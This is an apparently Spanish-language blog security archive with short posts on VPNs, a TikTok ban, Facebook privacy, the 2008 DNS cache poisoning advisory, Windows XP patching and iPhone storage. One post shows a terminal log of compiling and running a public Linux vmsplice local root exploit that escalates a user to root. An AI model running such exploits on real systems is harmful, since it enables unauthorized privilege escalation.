Category Archives: Seguridad

Me sirve de algo una VPN?

Posted on by

Primero, veamos algo: ¿Qué es una VPN y cómo usarla?


Una VPN (Red Privada Virtual) es una herramienta que protege tu privacidad y seguridad en internet. Funciona como un “túnel seguro” que encripta tus datos y oculta tu ubicación, permitiéndote navegar de forma anónima y acceder a contenido restringido. A continuación, te explicaré cómo usar un VPN para ver TV de otros países y cómo proteger tus dispositivos móviles.

En México, muchos servicios de streaming, como Netflix, HBO Max o Disney+, tienen catálogos limitados en comparación con otros países. Con un VPN, puedes “cambiar” tu ubicación virtual para acceder a esos contenidos.

Para esto debes:
1. Elige un VPN confiable: Algunas opciones populares son NordVPN, ExpressVPN, Surfshark o ProtonVPN
2. Descarga e instala la aplicación: Ve a la tienda de aplicaciones de tu dispositivo (Google Play Store o App Store) y busca el VPN que elegiste.
3. Conéctate a un servidor en otro país:
   – Abre la aplicación del VPN.
   – Selecciona un país donde el contenido que quieres ver esté disponible (por ejemplo, Estados Unidos para Netflix US o España para HBO Max España).
   – Haz clic en “Conectar”.
4. Accede a tu servicio de streaming:
   – Abre Netflix, HBO Max, o cualquier otra plataforma.
   – Ahora verás el catálogo del país que seleccionaste en el VPN.
5. Podrás ver series, películas o programas que no están disponibles en México.

– **Netflix**: En México, el catálogo de Netflix tiene menos películas y series que en Estados Unidos. Si quieres ver una serie como *The Office* (que solo está disponible en Netflix US), conectas tu VPN a un servidor en EE.UU. y accedes a Netflix. ¡Listo! Tendrás acceso a ese contenido.
– **HBO Max**: Algunas series o películas, como *Friends* o *The Big Bang Theory*, no están disponibles en HBO Max México, pero sí en HBO Max España. Con un VPN, te conectas a un servidor en España y accedes al catálogo español.

En México, es común conectarse a redes Wi-Fi públicas en lugares como cafeterías, centros comerciales o aeropuertos. Estas redes suelen ser inseguras, y los hackers pueden robar tu información personal. Una VPN protege tus datos y evita que esto suceda, además tu información estará encriptada, y nadie podrá acceder a tus datos personales, como contraseñas o números de tarjetas de crédito.

Imagínate estos escenarios:


– Estás en un café en la Ciudad de México y te conectas al Wi-Fi público para revisar tu correo o hacer una compra en Amazon. Sin un VPN, un hacker podría interceptar tu conexión y robar tu información. Con un VPN activado, tus datos están protegidos, y puedes navegar con tranquilidad.
– Si viajas a un aeropuerto y te conectas al Wi-Fi gratuito para revisar tu banca en línea, el VPN asegura que nadie pueda acceder a tus datos bancarios.

Así que recuerda los beneficios de usar una VPN:


1. Evita el rastreo: Las empresas y los anunciantes no podrán seguir tu actividad en internet.
2. Acceso a contenido global: Además de TV, puedes acceder a páginas web o servicios bloqueados en México o en el país donde te encuentres.
3. Protección en todos tus dispositivos: Muchos VPN permiten usarse en varios dispositivos al mismo tiempo (móvil, computadora, tablet, etc.).
4. Ahorro en compras en línea: Algunos servicios, como vuelos o hoteles, tienen precios más bajos en otros países. Con una VPN, puedes “aparecer” en ese país y aprovechar ofertas.

Una VPN es una herramienta útil y fácil de usar que te permite con solo unos clic  mejorar tu experiencia en internet y mantener tus datos seguros. ¡Anímate a probarlo!

Quien realmente se beneficia si TikTok es baneado en Estados Unidos?

Posted on by

Desde el anuncio que el gobierno estadounidense está considerando prohibir la popular aplicación de redes sociales TikTok, ha habido mucha especulación sobre quién realmente se beneficiará si la aplicación es finalmente prohibida.

¿Es esta una movida política para mostrar fuerza contra China, la casa de TikTok y su empresa matriz, ByteDance, o hay una preocupación real por la
seguridad nacional?

Mientras que el gobierno de los EE. UU. ha expresado su preocupación por la manera en que TikTok maneja los datos de los usuarios, muchos han argumentado que su verdadera motivación es política.

Al prohibir TikTok, el gobierno de los EE. UU. podría aumentar la tensión con China y enviar una señal clara de que no aceptará más la gestión del país sobre sus redes sociales.

Si bien es cierto que las preocupaciones de seguridad nacional son legítimas y deben ser abordadas, prohibir una aplicación con 150 millones de usuarios Estadounidenses, también tendría implicaciones económicas significativas. Muchos creadores de contenido han construido sus carreras en TikTok, y una prohibición les impediría acceder a su audiencia y potencial de ingresos.

En última instancia, es difícil determinar quién se beneficiará más de una posible prohibición de TikTok. Si bien parece haber motivaciones políticas en juego, la protección de la privacidad de los ciudadanos estadounidenses también debería ser una prioridad.

Con suerte, cualquier decisión tomada se basará en evidencia y tendrá en cuenta las ramificaciones tanto políticas como económicas de una prohibición de TikTok.

Guía de privacidad en Facebook

Posted on by

Neoteo by NeoTeo on Oct 4, 2011 3:45 AM

Parece una broma, pero sigue siendo así: Las opciones de privacidad dentro de Facebook son tantas que es necesaria una guía para conocerlas mejor. La red social ha tenido muchos cambios en ese aspecto, y existen opciones que son prácticamente desconocidas. Si quieres ajustar un poco la integridad de tu perfil y prefieres ocultar algunas cosas, deberías dar un vistazo. Al mismo tiempo, revisar tus opciones de privacidad en Facebook también te ayudará a mejorar la seguridad de la cuenta, un factor que suele ser muy pobre entre la mayoría de los usuarios.

Ver articulo completo: http://www.neoteo.com/guia-de-privacidad-en-facebook

Apple busca dos responsables de seguridad

Posted on by

Apple busca dos responsables de seguridad – Apple, Mac, Iphone. Tengo un Mac
by Chus Vilallonga on Sep 6, 2011 4:38 AM

Para muchos, el hecho de que Apple haya supuestamente perdido otro prototipo de iPhone, podría ser un buen motivo para agrandar la plantilla de personal de seguridad de Cupertino. La empresa ha convocado dos plazas de personal de seguridad con el fin de proteger los productos no lanzados, así como su propiedad intelectual.

Los candidatos trabajarán en el campus de Cupertino, aunque gran parte del tiempo lo dedicarán a viajar por todo el mundo. Es aquí donde puede que tenga algo que ver la proliferación de tiendas Apple falsas en algunos países, batalla en la cual la compañía parece que no ha recibido el suficiente respaldo por parte de las autoridades, según desveló recientemente Wikileaks.

En los últimos tiempos, Apple ha visto violada su propiedad intelectual desde varios flancos, rozando en algunos casos -como el del mercado asiático- el descaro más absoluto, aparte de las falsificaciones.

Vía | Appleinsider

Infant Swmming Resource (ISR)

Posted on by
Reply

CHILD WATER SURVIVAL

Mi hija es aproximadamente de la edad del bebe de este video. Sinceramente me impresionó mucho verlo.

Habrá algo asi en Veracruz?, por que sino, seguirè sin tener “piscina” en casa (solo por eso).
La idea de “Infant Swimming Resource (ISR)” nación en 1966 cuando su fundador el Dr. Harvey Barnett, tenía tan solo 18 años. Como Salvavidas activo con una pasión por la seguridad en el agua, Barnett fué testigo de la tragedia de un niño vecino suyo que murió ahogado. En ese instante hizo votos para hacer lo posible de asegurarse que no volviera a ver otro niño ahogado.

Barnett empezo a enseñarle a sus pequeños hijos a nadar. A medida que enseñaba a los niños a nadar, Barnett observó como respondian a cierto tipo de instrucciones, lo rápido que podian aprender algunas técnicas y a que tipo de comunicaciones ellos respondian más efectivamente. Tomó muchas películas “Super 8” y empezó a desarrollar una técnica especifíca que pudiera ser usada hasta con niños que todavía no hablaran. Este fué el inicio de una investigación de lo que hoy es conocido como “Infant Swimming Resource’s” metodología propietaria y provaba que enseña a bebes desde los 6 meses hasta los 6 años a nadar, salvarse a si mismos en un accidente donde caigan al agua.

Actualiza tu windogs sin usar Windows Update

Posted on by
Reply

Pues resulta “de que” si requieres actualizar tu windogs con los últimos parches (version 2.9 a fecha de mayo 2008) y lo requieres hacer en varias computadoras ó no quieres conectar tu computadora sin parches a internet, lo que debes de hacer es conseguirte el WinUp.

Este programita tiene las últimas actualizaciones de Windogs XP (ya dijimos que hasta mayo 2008) se puede bajar de aqui y solamente tienes que correr la el programita, se instalará el “actualizador” y luego ejecuta este actualizador y en cuestión de unas dos horas tu pc estará actualizada.

Requiere el SP2. Si no tienes el SP2 puedes bajar el WinUp con todo y el SP2 de aca.

30 días para evitar los mayores fraudes en la historia de Internet?

Posted on by
Reply

Pues les platico que acabo de leer un documento en el Debian Security Announce del 8 de julio donde reza el siguiente encabezado:

[SECURITY] [DSA 1603-1] New bind9 packages fix cache poisoning

Package : bind9
Vulnerability : DNS cache poisoning
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2008-1447
CERT advisory : VU#800113

Bien… un señor llamado Dan Kaminsky descubrió el problema que, cuando se llega a hacer un ataque exitoso se puede dirigir tráfico y correo hacia servidores que no son los verdaderos.

Esto en otras palabras si el DNS que estas utilizando en tu casa, en tu oficina en tu escuela, en tu conexión privada, en tu conexión pirata es vulnerable y llega a ser atacado con éxito, entonces, tu, al tratar de entrar a tu cuenta de tu banco favorito (sea el que sea, hsbc, banamex, bancomer, santander, scotia, patito, amex) o alguna institución donde tengas que dar cuenta y password (hotmail, gmail, yahoo, hotmaiz) estarás regalando números y contraseñas a los “malosos”.

Para saber si tienes problemas (asi como ya vi que los tengo yo donde trabajo) entra al siguiente link y da click en donde dice “Check My DNS” y si no tienes broncas te saldrá un mensaje como:

Your name server, at 200.33.146.209, appears to be safe

Ahora, si tienes problemas te aparecerá algo asi:

Your name server, at 209.244.7.56, appears vulnerable to DNS Cache Poisoning.

Y chistoso, despues de un anuncio de esta naturaleza se lee en la última linea del documento:

We recommend that you upgrade your bind9 package.

El problema en general es falta de randomización en el software del DNS.

La actualización para Bind 9 en Debian es tener el puerto source randomizado (UDP logicamente). Esto cambia el tamaño del espacio que tiene el atacante para adivinar valores en algún tipo de reversa compatible y hace que un ataque exitoso sea mucho más dificil…. OSEAAAAAA que si te quieren chingar chance y lo logren, todo dependerá de quien lo haga.

Ahhhh se me olvidaba, las actualizaciones que estan circulando en internet se han hecho de una forma que no sea tan sencillo ver la vulnerabilidad, esto es para que no haya “muchos” ataques antes de tiempo.. je je je. En 30 días (yo creo que despues de la primera semana de julio) será dada a conocer la vulnerabilidad y se espera que la mayoría este parchado y libre de cualquier posible vulnerabilidad… y si no… que Dios nos agarre confesados y sin dinero en nuestras cuentas bancarias…..

que porqueria los exploits….

Posted on by
Reply

SIN PALABRAS…

fcarmona@larissa:~$ gcc exploit.c -o exploit
fcarmona@larissa:~$ ./exploit
fcarmona@larissa:~$ whoami
fcarmona
fcarmona@larissa:~$ ./exploit
———————————–
 Linux vmsplice Local Root Exploit
 By qaaz
———————————–
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dbb000 .. 0xb7ded000
[+] root
root@larissa:~# whoaim
bash: whoaim: command not found
root@larissa:~# whoami
root
root@larissa:~#
root@larissa:~#
root@larissa:~# exit
fcarmona@larissa:~$

Evita que tu iphone se bloqueé por falta de espacio al actualizar las aplicaciones

Posted on by
Reply

Para que evites que tu iphone se lo lleve el traste y luego ya no levante por que instalaste una aplicación y se lleno, debes de mover las apliaciones a un directorio con suficiente espacio, por ejemplo el firmware 1.0.2 te dejába como 130MB para instalar aplicaiones, pero el 1.1.1 te deja solamente como 35-40MB, asi que debes de hacer lo siguiente:

Asumo que ya lo tienes desbloqueado y que esta funcionando.

Instala las apliaciiones Term-vt100 y BSD subsystem. Term-vt100 te dejará crear una consola de tu iphone que es un shell del unix.

Una vez adentro verás un # (gato) de prompt, lo que significa que estas como superusuario, lo primero que debes de hacer es cambiar la contraseña con el comando:

passwd

te pedirá que le des la contraseña y seguido de esto que la confirmes.

Una vez ya más seguro tu iphone entonces te mueves a la carpeta raiz:

cd /

copias recursivamente la carpeta Applications

cp -r Applications /private/var/Applications

luego, renombras la carpeta original

mv Applications Applitacions.orig

y para finalizar en la consola creas una liga hacia el nuevo directorio de apliacaciones

ln -s /private/var/Applications Applications

reinicias el iphone y listo. Desde ahora, cada vez que instales una nueva aplicación caerá en /private/var/Applications y no en el filesystem del sistema operativo y con esto tendrás compartido el espacio de tu música con la de tus aplicaciones y no se te bloqueará por falta de espacio en raiz (/)